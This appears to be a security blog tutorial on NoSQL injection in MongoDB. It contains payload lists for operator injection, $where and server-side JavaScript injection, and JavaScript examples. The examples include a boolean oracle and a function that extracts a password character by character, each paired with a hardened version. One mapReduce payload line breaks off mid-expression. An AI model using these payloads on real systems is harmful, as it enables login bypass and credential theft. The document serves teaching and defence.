NoSqli

Hi there!

This is the fourth topic in this series. You can also have a look at the other topics to get a better idea of the series and its pattern.

Fourth Topic - NoSQL Injection

Resources

Tools

Labs

Basic commands to query a NoSQL database (MongoDB shell syntax)

show databases                       Lists all the databases available (show dbs does the same).
use <db>                             Switches to the given database.
db                                   Prints the current database.
show collections                     Lists the collections (the NoSQL equivalent of tables) in the current database.
db.<collection>.find()               Performs a query on a collection or a view and returns a cursor object.
db.getCollection("<name>").find()    The same, for collection names that are not valid JavaScript identifiers.
db.<collection>.drop()               Removes the specified collection from the database.

Common Payloads

Operator injection. The input is parsed as JSON or as a nested query string, so an object instead of a string reaches the query; `{ $ne: 1 }` as the password turns the check into "password is not the number 1", which every account satisfies:

{ $ne: 1 }
{$gt: ''}
[$ne]=1                (query-string form, e.g. username[$ne]=1, for body parsers that build nested objects from bracket syntax)

Injection into a query that the application assembles as text and then evaluates. The prefix (true, `,`, `'`, 1,) closes the value being built and the rest appends an always-true clause or a marker:

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'

Injection into a $where clause or other server-side JavaScript. The trailing // comments out the rest of the original expression; +%00 is a URL-encoded null byte that truncates the string where the parser honours one, and the %20%26%26%20 variants are the URL-encoded form of ' && ':

|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00

The passwordzz variants reference a field that does not exist. If the response differs from the password variant (an error instead of a result), the input is being evaluated as JavaScript and the field name password is confirmed.

Once JavaScript execution is confirmed, these check whether writes and long-running operations can be triggered:

db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
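The operator payloads above ({ $ne: 1 }, {$gt: ''}, [$ne]=1) only work because the application hands a parsed object to the query where it expected a string. The following is an added example, not code from the original post: a small in-memory matcher that implements just the operators those payloads use ($ne, $gt, $regex), a vulnerable login built on it, a hypothetical minimal parser for the bracket syntax behind [$ne]=1 (mimicking what nested query-string parsers do), and the hardened login that rejects anything that is not a string. The sample users are constructed data.

```javascript
// Added example (not from the original post): why `{ $ne: 1 }`, `{$gt: ''}`
// and `username[$ne]=1` bypass a login that builds its query from user input.
// A tiny in-memory matcher stands in for MongoDB and supports only the
// operators those payloads use ($ne, $gt, $regex) plus equality; enough to
// show the effect without a database.

// Constructed sample collection (hypothetical data, no real credentials).
const users = [
  { username: 'admin', password: 'S3cret!', role: 'admin' },
  { username: 'alice', password: 'alice123', role: 'user' },
];

// Evaluate one field condition the way MongoDB would, for the supported subset.
function matchField(value, cond) {
  const isOperatorObject =
    cond !== null && typeof cond === 'object' && !Array.isArray(cond) &&
    Object.keys(cond).some((k) => k.startsWith('$'));
  if (!isOperatorObject) {
    // Plain equality; objects without operators are compared as whole values.
    return JSON.stringify(value) === JSON.stringify(cond);
  }
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case '$ne': return value !== arg;
      // Simplification of BSON ordering: only compare values of the same type.
      case '$gt': return typeof value === typeof arg && value > arg;
      case '$regex': return typeof value === 'string' && new RegExp(arg).test(value);
      default: throw new Error('unsupported operator ' + op);
    }
  });
}

// find(): every key of the query must match the document.
function find(collection, query) {
  return collection.filter((doc) =>
    Object.entries(query).every(([field, cond]) => matchField(doc[field], cond)));
}

// Vulnerable login: the parsed request body is used as-is, so a JSON body of
// {"username": "admin", "password": {"$ne": 1}} turns the password check into
// "password is not the number 1", which every account satisfies.
function vulnerableLogin(body) {
  return find(users, { username: body.username, password: body.password });
}

// Hypothetical minimal parser for the bracket syntax that the page's
// `[$ne]=1` payload relies on (the behaviour of nested query-string parsers):
// "username[$ne]=1" -> { username: { $ne: '1' } }.
function parseQueryString(qs) {
  const out = {};
  for (const pair of qs.split('&')) {
    const [rawKey, rawVal] = pair.split('=');
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal || '');
    const m = key.match(/^([^[\]]+)\[([^[\]]+)\]$/);
    if (m) {
      out[m[1]] = out[m[1]] || {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Hardened login: accept only strings, so an operator object can never reach
// the query no matter how the body or query string was parsed.
function safeLogin(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  return find(users, { username, password });
}
```

Calling vulnerableLogin({ username: 'admin', password: { $ne: 1 } }) returns the admin document, and the same happens when the body comes from parseQueryString('username=admin&password[$ne]=1'). The fix is a type check at the boundary rather than stripping keys that start with $: rejecting keeps the contract explicit and does not depend on how the next parser in the chain happens to build objects.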

SSJI (Server-Side JavaScript Injection)

Breaks out of the string and returns a comparison that is always true:

';return 'a'=='a' && ''=='

A false/true pair for boolean-based testing; if the two responses differ, the input is being executed as JavaScript:

\";return(false);var xyz='a
\";return(true);var xyz='a
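The $where payloads in the Common Payloads list (|| 1==1, ' && this.password.match(/.*/)//) and the SSJI pair above all rely on the same thing: user input concatenated into JavaScript that the database then executes. The following is an added example, not code from the original post. It simulates MongoDB's $where evaluation with new Function so it runs without a server, builds a boolean oracle on a vulnerable login, shows the passwordzz trick producing an error instead of a result, and goes beyond the page's .match(/.*/) payload by narrowing the regex one character at a time to read the password out. The accounts array is constructed data; evaluateWhere, oracle and extractField are names chosen for this example.

```javascript
// Added example (not from the original post): injection into a $where clause,
// i.e. server-side JavaScript injection. MongoDB evaluates a $where string as
// JavaScript with `this` bound to each document; evaluateWhere() below does the
// same with `new Function` so the effect can be seen without a server.

// Constructed sample collection (hypothetical data, no real credentials).
const accounts = [
  { username: 'admin', password: 'S3cret!' },
  { username: 'alice', password: 'alice123' },
];

// Stand-in for MongoDB's $where evaluation. Anything the expression throws
// (a SyntaxError, or the TypeError from `this.passwordzz.match`) is reported
// as an error, mirroring the query error the server would return.
function evaluateWhere(collection, expr) {
  try {
    // `return (` stays on the first line so that a trailing `//` in the
    // payload only comments out the rest of that line, not the closing paren.
    const fn = new Function('return (\n' + expr + '\n);');
    return { docs: collection.filter((doc) => fn.call(doc)) };
  } catch (e) {
    return { error: e.constructor.name + ': ' + e.message };
  }
}

// Vulnerable login: user input concatenated straight into the JS expression.
function vulnerableWhereLogin(username, password) {
  const expr = "this.username == '" + username + "' && this.password == '" + password + "'";
  return evaluateWhere(accounts, expr);
}

// Boolean oracle built on the vulnerable login: true if at least one document
// matched, false if none did, 'error' if the injected JavaScript threw.
function oracle(usernameInput) {
  const r = vulnerableWhereLogin(usernameInput, 'x');
  if (r.error) return 'error';
  return r.docs.length > 0;
}

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Generalisation of the page's `' && this.password.match(/.*/)//` payload:
// narrow the regex one character at a time and read the field out through the
// oracle. The trailing `//` comments out the original password comparison.
function extractField(targetUser, fieldName, maxLen = 32) {
  const charset =
    'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#_-';
  let known = '';
  for (let i = 0; i < maxLen; i++) {
    const before = known;
    for (const c of charset) {
      const payload = targetUser + "' && this." + fieldName +
        '.match(/^' + escapeRegex(known + c) + '/)//';
      if (oracle(payload) === true) { known += c; break; }
    }
    if (known === before) break; // no character extends the prefix: finished
  }
  return known;
}

// Hardened version: no $where at all. Inputs must be strings and are matched
// by plain equality, so nothing the user sends is ever parsed as code.
function loginWithoutWhere(username, password) {
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  return accounts.filter((a) => a.username === username && a.password === password);
}
```

oracle("admin' && this.password.match(/.*/)//") returns true while oracle("admin' && this.passwordzz.match(/.*/)//") returns 'error', which is the difference the passwordzz payloads look for; extractField('admin', 'password') then recovers S3cret! character by character. The +%00 suffix on the page's payloads is not needed here because the simulated server does not truncate at a null byte. Besides never concatenating input into $where, server-side JavaScript can be switched off entirely with security.javascriptEnabled: false in the mongod configuration, which removes this whole class of payloads.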



References

Feel free to drop any suggestions via my social handles.
Thanks for reading!
